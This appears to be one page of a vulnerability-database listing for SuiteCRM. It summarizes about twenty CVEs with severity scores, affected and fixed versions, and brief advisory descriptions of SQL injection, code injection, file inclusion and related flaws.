Salesagility Suitecrm vulnerabilities
105 known vulnerabilities affecting salesagility/suitecrm.
Total CVEs
105
CISA KEV
0
Public exploits
5
Exploited in wild
1
Severity breakdown
CRITICAL21HIGH43MEDIUM40LOW1
Vulnerabilities
Page 3 of 6
CVE-2015-5948P3HIGHCVSS 8.1≤ 7.2.22017-09-06
CVE-2015-5948 [HIGH] CVE-2015-5948: Race condition in SuiteCRM before 7.2.3 allows remote attackers to execute arbitrary code. NOTE: th
Race condition in SuiteCRM before 7.2.3 allows remote attackers to execute arbitrary code. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-5947.
nvd
CVE-2023-6131P3HIGHCVSS 8.8fixed in 7.12.14v7.14.0+3 more2023-11-14
CVE-2023-6131 [HIGH] CWE-94 CVE-2023-6131: Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
nvd
CVE-2023-6125P3HIGHCVSS 8.8fixed in 7.12.14v7.14.0+3 more2023-11-14
CVE-2023-6125 [HIGH] CWE-94 CVE-2023-6125: Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
nvd
CVE-2024-36409P3HIGHCVSS 8.8fixed in 7.14.4≥ 8.0.0, < 8.6.1+1 more2024-06-10
CVE-2024-36409 [HIGH] CWE-89 CVE-2024-36409: SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions
SuiteCRM is an open-source Customer Relationship Management (CRM) software application. In versions prior to 7.14.4 and 8.6.1, poor input validation allows for SQL Injection in Tree data entry point. Versions 7.14.4 and 8.6.1 contain a fix for this issue.
nvd
CVE-2024-50332P3HIGHCVSS 8.8fixed in 7.14.6≥ 8.0.0, < 8.7.1+1 more2024-11-05
CVE-2024-50332 [HIGH] CWE-89 CVE-2024-50332: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Insufficient input value validation causes Blind SQL injection in DeleteRelationShip. This issue has been addressed in versions 7.14.6 and 8.7.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.
nvd
CVE-2025-54785P3HIGHCVSS 8.8v7.14.6v8.8.02025-08-07
CVE-2025-54785 [HIGH] CWE-20 CVE-2025-54785: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 7.14.6 and 8.8.0, user-supplied input is not validated/sanitized before it is passed to the unserialize function, which could lead to penetration, privilege escalation, sensitive data exposure, Denial of Service, cryptomining and ransom
nvd
CVE-2024-1644P3HIGHCVSS 8.8v7.14.22024-02-20
CVE-2024-1644 [HIGH] CWE-434 CVE-2024-1644: Suite CRM version 7.14.2 allows including local php files. This is possible because the application
Suite CRM version 7.14.2 allows including local php files. This is possible
because the application is vulnerable to LFI.
nvd
CVE-2022-45186P3HIGHCVSS 8.1v7.12.72025-01-07
CVE-2022-45186 [HIGH] CVE-2022-45186: An issue was discovered in SuiteCRM 7.12.7. Authenticated users can recover an arbitrary field of a
An issue was discovered in SuiteCRM 7.12.7. Authenticated users can recover an arbitrary field of a database.
nvd
CVE-2019-14454P3CRITICALCVSS 9.8≥ 7.10.0, < 7.10.20≥ 7.11.0, < 7.11.82019-10-02
CVE-2019-14454 [CRITICAL] CVE-2019-14454: SuiteCRM 7.11.x and 7.10.x before 7.11.8 and 7.10.20 is vulnerable to vertical privilege escalation.
SuiteCRM 7.11.x and 7.10.x before 7.11.8 and 7.10.20 is vulnerable to vertical privilege escalation.
nvd
CVE-2019-13335P3CRITICALCVSS 9.8≥ 7.10.0, < 7.10.19≥ 7.11.0, < 7.11.72019-10-02
CVE-2019-13335 [CRITICAL] CWE-918 CVE-2019-13335: SalesAgility SuiteCRM 7.10.x 7.10.19 and 7.11.x before and 7.11.7 has SSRF.
SalesAgility SuiteCRM 7.10.x 7.10.19 and 7.11.x before and 7.11.7 has SSRF.
nvd
CVE-2023-6126P3CRITICALCVSS 9.8fixed in 7.12.14v7.14.0+3 more2023-11-14
CVE-2023-6126 [CRITICAL] CWE-94 CVE-2023-6126: Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
nvd
CVE-2019-25663P3HIGHCVSS 7.1≤ 7.10.72026-04-05
CVE-2019-25663 [HIGH] CWE-89 CVE-2019-25663: SuiteCRM 7.10.7 contains a SQL injection vulnerability that allows authenticated attackers to manipu
SuiteCRM 7.10.7 contains a SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the parentTab parameter. Attackers can send GET requests to the email module with malicious parentTab values using boolean-based SQL injection techniques to extract sensitive database information.
nvd
CVE-2021-45898P3CRITICALCVSS 9.8fixed in 7.12.3≥ 8.0.0, < 8.0.2+1 more2022-01-28
CVE-2021-45898 [CRITICAL] CVE-2021-45898: SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows local file inclusion.
SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows local file inclusion.
nvd
CVE-2019-25664P3HIGHCVSS 7.1≤ 7.10.72026-04-05
CVE-2019-25664 [HIGH] CWE-89 CVE-2019-25664: SuiteCRM 7.10.7 contains a time-based SQL injection vulnerability in the record parameter of the Use
SuiteCRM 7.10.7 contains a time-based SQL injection vulnerability in the record parameter of the Users module DetailView action that allows authenticated attackers to manipulate database queries. Attackers can append SQL code to the record parameter in GET requests to the index.php endpoint to extract sensitive database information through time-based b
nvd
CVE-2021-41597P3HIGHCVSS 8.8≥ 7.10.0, < 7.10.35≥ 7.12, < 7.12.22022-01-12
CVE-2021-41597 [HIGH] CWE-352 CVE-2021-41597: SuiteCRM through 7.11.21 is vulnerable to CSRF, with resultant remote code execution, via the Upgrad
SuiteCRM through 7.11.21 is vulnerable to CSRF, with resultant remote code execution, via the UpgradeWizard functionality, if a PHP file is included in a ZIP archive.
nvd
CVE-2025-64493P3MEDIUMCVSS 6.5≥ 8.6.0, < 8.9.12025-11-08
CVE-2025-64493 [MEDIUM] CWE-89 CVE-2025-64493: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. In versions 8.6.0 through 8.9.0, there is an authenticated, blind (time-based) SQL-injection inside the appMetadata-operation of the GraphQL-API. This allows extraction of arbitrary data from the database, and does not require administrative acce
nvd
CVE-2023-6130P3HIGHCVSS 8.8fixed in 7.12.14v7.14.0+3 more2023-11-14
CVE-2023-6130 [HIGH] CWE-29 CVE-2023-6130: Path Traversal: '\..\filename' in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14,
Path Traversal: '\..\filename' in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.
nvd
CVE-2021-25960P3HIGHCVSS 8.0≥ 7.10.29, < 7.10.32≥ 7.11.18, < 7.11.212021-09-29
CVE-2021-25960 [HIGH] CVE-2021-25960: In “SuiteCRM” application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by “
In “SuiteCRM” application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by “CSV Injection” vulnerability (Formula Injection). A low privileged attacker can use accounts module to inject payloads in the input fields. When an administrator access accounts module to export the data as a CSV file and opens it, the payload gets executed. Th
nvd
CVE-2020-8801P3HIGHCVSS 7.2≤ 7.11.112020-02-13
CVE-2020-8801 [HIGH] CWE-502 CVE-2020-8801: SuiteCRM through 7.11.11 allows PHAR Deserialization.
SuiteCRM through 7.11.11 allows PHAR Deserialization.
nvd
CVE-2024-49774P3HIGHCVSS 7.2fixed in 7.14.6≥ 8.0.0, < 8.7.12024-11-05
CVE-2024-49774 [HIGH] CWE-20 CVE-2024-49774: SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software applica
SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. SuiteCRM relies on the blacklist of functions/methods to prevent installation of malicious MLPs. But this checks can be bypassed with some syntax constructions. SuiteCRM uses token_get_all to parse PHP scripts and check the resulted AST against bla
nvd